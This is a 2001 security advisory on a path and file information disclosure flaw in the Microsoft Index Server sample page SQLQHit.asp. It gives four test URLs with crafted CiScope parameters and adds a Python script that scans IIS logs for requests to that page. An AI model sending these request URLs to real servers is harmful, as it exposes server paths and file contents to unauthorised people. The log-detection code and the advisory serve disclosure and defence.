
Microsoft Index Server 2.0 File Information and Path Disclosure Issue


Published: 2001-09-17
Updated: 2001-09-17
Severity:
Threat level: Server information disclosure
Error type: Design error
Exploitation method: Server mode

Affected systems
Microsoft Index Server 2.0
   + Microsoft IIS 4.0
      + Microsoft Windows NT 4.0 Option Pack
         - Microsoft Windows NT 4.0SP7
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         + Microsoft Windows NT 4.0
      + Microsoft BackOffice 4.5
         - Microsoft Windows NT 4.0
      + Microsoft BackOffice 4.0
         - Microsoft Windows NT 4.0
      + Cisco uOne 4.0
      + Cisco uOne 3.0
      + Cisco uOne 2.0
      + Cisco uOne 1.0
      + Cisco Unity Server 2.4
      + Cisco Unity Server 2.3
      + Cisco Unity Server 2.2
      + Cisco Unity Server 2.0
      + Cisco IP/VC 3540
      + Cisco ICS 7750
      + Cisco Call Manager 3.0
      + Cisco Call Manager 2.0
      + Cisco Call Manager 1.0
      + Cisco Building Broadband Service Manager 5.0
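Detailed description
sqlqhit.asp is a sample file that performs web-based SQL queries. A malicious user can send a specially crafted HTTP request to the Index Server on IIS and cause disclosure of server path information, file attributes, or the contents of certain files.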

Test code
By default, the sqlqhit.asp file is located in the following directory: \inetpub\iissamples\ISSamples\

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=fileinfo
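
To check whether the sample page has been requested on a server, the following added example (not part of the original advisory) scans IIS W3C extended log text for requests to SQLQHit.asp and reports the CiScope and CiColumns values used. The log field layout and the sample log lines are constructed assumptions.

```python
"""Flag IIS W3C log entries that request the Index Server sample page SQLQHit.asp."""
from urllib.parse import parse_qs, unquote

# Path from the advisory, lowercased (IIS URL paths are case-insensitive).
SAMPLE_PAGE = "/iissamples/issamples/sqlqhit.asp"
# Assumed field order, used only when the log has no "#Fields:" directive.
DEFAULT_FIELDS = "date time c-ip cs-method cs-uri-stem cs-uri-query sc-status".split()

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-17 10:01:02 192.0.2.10 GET /default.asp - 200
2001-09-17 10:01:05 192.0.2.77 GET /iissamples/ISSamples/SQLQHit.asp CiColumns=*&CiScope=webinfo 200
2001-09-17 10:01:09 192.0.2.77 GET /IISSamples/issamples/sqlqhit.asp CiColumns=*&CiScope=extended_fileinfo 200
2001-09-17 10:02:00 192.0.2.15 GET /iissamples/ISSamples/%53QLQHit.asp cicolumns=%2A&ciscope=fileinfo 404
2001-09-17 10:03:00 192.0.2.20 GET /iissamples/ISSamples/query.asp - 200
"""


def find_sqlqhit_requests(log_text):
    """Return one dict per request to SQLQHit.asp, with client, scope and status."""
    fields, hits = DEFAULT_FIELDS, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # honour the log's own column order
            continue
        if not line.strip() or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        # Normalise percent-encoding and case before comparing the path.
        if unquote(row.get("cs-uri-stem", "")).lower() != SAMPLE_PAGE:
            continue
        query = parse_qs(row.get("cs-uri-query", ""))
        params = {key.lower(): values[0] for key, values in query.items()}
        hits.append({
            "client": row.get("c-ip"),
            "scope": params.get("ciscope"),      # e.g. webinfo, fileinfo
            "columns": params.get("cicolumns"),
            # A 200 means the sample page is still installed and answered the query.
            "served": row.get("sc-status") == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in find_sqlqhit_requests(SAMPLE_LOG):
        print(hit)
```
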

Solution
None yet

Related information